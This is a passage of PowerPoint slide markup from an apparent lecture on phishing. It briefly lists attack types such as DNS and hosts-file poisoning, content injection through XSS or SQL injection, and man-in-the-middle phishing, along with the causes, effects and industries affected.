              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hosts file poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Polluting user’s DNS cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Proxy server compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" i="1" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"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F5E149BA-F444-4689-8738-5D19B74F473E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{055637D3-27B7-480E-84EE-FCF911CD4886}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30106164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36B2FE63-0ACF-4CA1-B5A3-065FDBA6966B}"/>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19459" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto"/>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Content-Injection – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Inserting malicious content into legitimate site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" i="1" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" b="1" i="1" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1" i="1" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Three primary types of content-injection phishing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" b="1" i="1" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" i="1" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Hackers can compromise a server through a security vulnerability and replace or augment the legitimate content with malicious content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Malicious content can be inserted into a site through a cross-site scripting vulnerability. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" b="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Malicious actions can be performed on a site through a SQL injection vulnerability.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2062EC43-EE91-485D-9B54-39526B2F5B9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E7715C9D-0CD1-4099-BBA3-6988290B934A}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32925735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B9CB450C-0A57-4AA1-AE75-5AC1E101B97F}"/>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21507"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b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Man-in-the-Middle Phishing - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Phisher positions himself between the user and the legitimate site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" i="1" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800"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C06333E4-54D7-4B86-A1D1-6CF5DD247289}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{4B507307-F818-4525-AA51-3D550D5C89A0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34041932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F552AB3E-154D-4401-AC98-D56E11DC4465}"/>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Types of Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555"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b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Search Engine Phishing - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Create web pages for fake products, get the pages indexed by search engines, and wait for users to enter their confidential information as part of an order, sign-up, or balance transfer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>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62BEBB2D-6184-4676-960E-99B345920D5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{048F0D3E-859B-4148-86AE-487BF65236A6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3897907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49E09BA2-FD0D-403B-99F0-6EB6615DA133}"/>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Causes of Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603"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Misleading e-mails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No check of source address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Vulnerability in browsers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No strong authentication at websites of banks and financial institutions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Limited use of digital signatures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Non-availability of secure desktop tools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Lack of user awareness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Vulnerability in applications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 and more</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Webdings" panose="05030102010509060703" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>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AFF4BFDD-2DF8-4C31-8F4F-D843289D969E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{4114AC71-3268-46F7-95E4-94255FF68E1F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1286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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273269" y="0"/>
            <a:ext cx="8555421" cy="723900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Phishing attack (stage 2): A fake webpage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15366" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="5638800"/>
            <a:ext cx="7772400" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.phishtank.com/phish_archive.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533399" y="914400"/>
            <a:ext cx="7924801" cy="43434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8F6ECEDF-4039-4811-9321-79F026D57C1F}"/>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Effects of Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651"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Internet fraud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </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Identity theft</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRP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Financial loss to the original institutions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Difficulties in Law Enforcement Investigations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Erosion of Public Trust in the Internet.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1" i="1" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="1D21CD"/>
              </a:solidFill>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3F40B6B-32E0-4E8E-AC87-F76D074214BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{6AE8A7E2-7C87-495D-BE3A-4DF91B9293BF}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35486330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A72A2F4E-7B18-4796-82AA-914623704E61}"/>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Industries affected</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699"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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Major industries affected are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Financial Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ISPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="8989FF"/>
              </a:buClr>
              <a:buSzPct val="70000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1" i="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1D21CD"/>
                </a:solidFill>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Online retailers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Webdings" panose="05030102010509060703" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" b="1" i="1" smtClean="0">
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ADC5E9F-82A4-4CC6-B3C2-6967F647958B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
